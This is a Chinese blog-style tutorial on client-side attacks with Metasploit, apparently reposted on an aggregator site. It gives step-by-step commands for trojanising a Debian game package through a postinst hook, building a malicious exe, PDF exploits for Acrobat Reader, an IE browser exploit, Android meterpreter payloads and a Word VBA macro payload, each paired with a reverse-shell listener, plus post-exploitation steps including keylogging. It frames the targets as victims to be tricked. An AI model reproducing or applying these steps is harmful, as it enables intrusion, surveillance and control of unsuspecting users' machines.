当前位置:网站首页>Metasploit——客户端渗透
Metasploit——客户端渗透
2022-08-10 22:53:00 【隐身的菜鸟】
目录
2.诱骗被害者执行Payload (Linux Deb安装包)
3. 利用Acrobat Reader漏洞执行payload
在无法突破网络边界的情况下转而攻击客户端
1.含有漏洞利用代码的WEB站点:利用客户端漏洞
2.社会工程学:骗取敏感信息,诱使目标执行含有漏洞利用代码的DOC、PDF等Payload
LHOST:反弹连接的目标IP地址
LPORT:反弹连接的目标端口
-a:指定目标系统的硬件架构
--platform:指定目标运行平台
-p:指定payload
-b:去掉坏字符
-e:使用编码模块
-i:编码次数
-f:指定输出文件格式
-o:输出文件名
1.诱骗被害者执行Payload (windows)
只要目标客户端执行制作的exe文件,就可获得目标shell
2.诱骗被害者执行Payload (Linux Deb安装包)
apt-get --download-only install freesweep
#只需要dep文件,加上参数–download-only,下载好的文件保存在/var/cache/qpt/archives
dpkg -x freesweep_0.90-1 i386.deb free
#解压缩文件,到指定目录free下
mkdir free/DEBIAN && cd free/DEBIAN
vi control
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
vi postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/
freesweep_scores & /usr/games/freesweep &
......
#将/root/下的free.deb,传给目标
-----------------------------------------------------------------------
msfconsole启动侦听
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set ......
exploit(开启侦听)
只要目标安装该文件,侦听的端口就会获得反弹的shell
3. 利用Acrobat Reader漏洞执行payload
(1) 构造PDF文件,诱使目标点击,只要目标用Acrobat Reader执行PDF文件,就可反弹shell
exploit/windows/fileformat/adobe_utilprintf
set payload windows/meterpreter/reverse_tcp
exploit
use exploit/multi/handler(开启侦听)
set payload windwos/meterpreter/reverse_tcp
exploit
(2)构造恶意网站
目标访问恶意网站,漏洞利用代码会执行,进一步执行payload,然后反弹shell
#获得meterpreter
>getuid #进程
>migrate 856 #迁移
>use priv #提权
>run post/windows/capture/keylog_recorder #取到shell的进一步攻击,键盘记录(post模块)
4. 利用Flash漏洞执行payload
设置反弹shell,设置跟构造恶意网站一样
5.利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
exploit
6.利用JRE漏洞执行payload
设置payload: set payload java/meterpreter/reverse_tcp
生成这个payload,就要生成一个安卓系统上可用的安装包文件,比如说一个.apk的安装包
-p android平台安卓,-t raw原始格式
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
7.VBScript感染方式
VBScript感染方式
- 利用宏感染word、excel文档
- 绕过某些基于文件类型检查的安全机制
- 生成vbscript脚本msfvenom -a x86 --platform windows -p windows/meterpreter
/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe
Office 2007 +(office版本2007以上)
新建word文档,选择视图一一宏一一创建
在创建的宏里粘入Payload第一部分的VBA代码
由 Sub Auto_Open() Goepu12 End Sub 到 Sub Workbook_Open() Auto_Open End Sub
word文档正文沾入Payload第二部分的内容
由Jjiktezjhl到最后
Msf启动侦听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
目标打开office,可获得shell
边栏推荐
- Glide监听Activity生命周期源码分析
- 带你造轮子,自定义一个随意拖拽可吸边的View
- web项目访问引用jar内部的静态资源
- HanLP词性表
- Three major logs in mysql
- Take you to build a wheel and customize a View that can be dragged and sucked at will
- PlaidCTF 2022 Amongst Ourselves:Shipmate writeup
- BM7 list entry in central
- 面试官: AMS在Android起到什么作用,简单的分析下Android的源码
- This visual tool artifact is more intuitive and easy to use!love so much
猜你喜欢
计算需要的MIPI lane数目
Take you to build a wheel and customize a View that can be dragged and sucked at will
基于深度学习的三维点云分割综述
分享一个后台管理系统可拖拽式组件的设计思路
Qualcomm Platform Development Series Explanation (Application) Introduction to QCMAP Application Framework
音乐播放器(未完成版本)
Ndk 和Cmake报错解决
Pro-test is effective | A method to deal with missing features of risk control data
web项目访问引用jar内部的静态资源
This visual tool artifact is more intuitive and easy to use!love so much
随机推荐
ArcGIS中的坐标系统和投影变换
【uniapp】uniapp微信小程序开发:启动微信开发者工具提示no such file or directory错误
pytorch tear CNN
二叉树 | 对称二叉树、相同的树、子树相同 | leecode刷题笔记
风控逻辑利器---规则引擎
腾讯云轻量应用服务器配置及建网站教程
带你造轮子,自定义一个随意拖拽可吸边的View
SurfaceView 的双缓冲
Detailed installation steps and environment configuration of geemap
gcc492 compile `.rodata‘ can not be used when making a PIE object; recompile with -fPIE
XSLeaks 侧信道攻击 (unfinished)
数学建模准备知识
二叉树 | 迭代遍历 | leecode刷题笔记
How does the Weiluntong touch screen display the current value of abnormal data while alarming?
Spark基础【RDD转换算子】
OneNote tutorial, how to organize notebooks in OneNote?
诺诚健华通过注册:施一公家族身价15亿 高瓴浮亏5亿港元
BM7 list entry in central
蓝帽杯 2022 web/misc writeup
实例051:按位与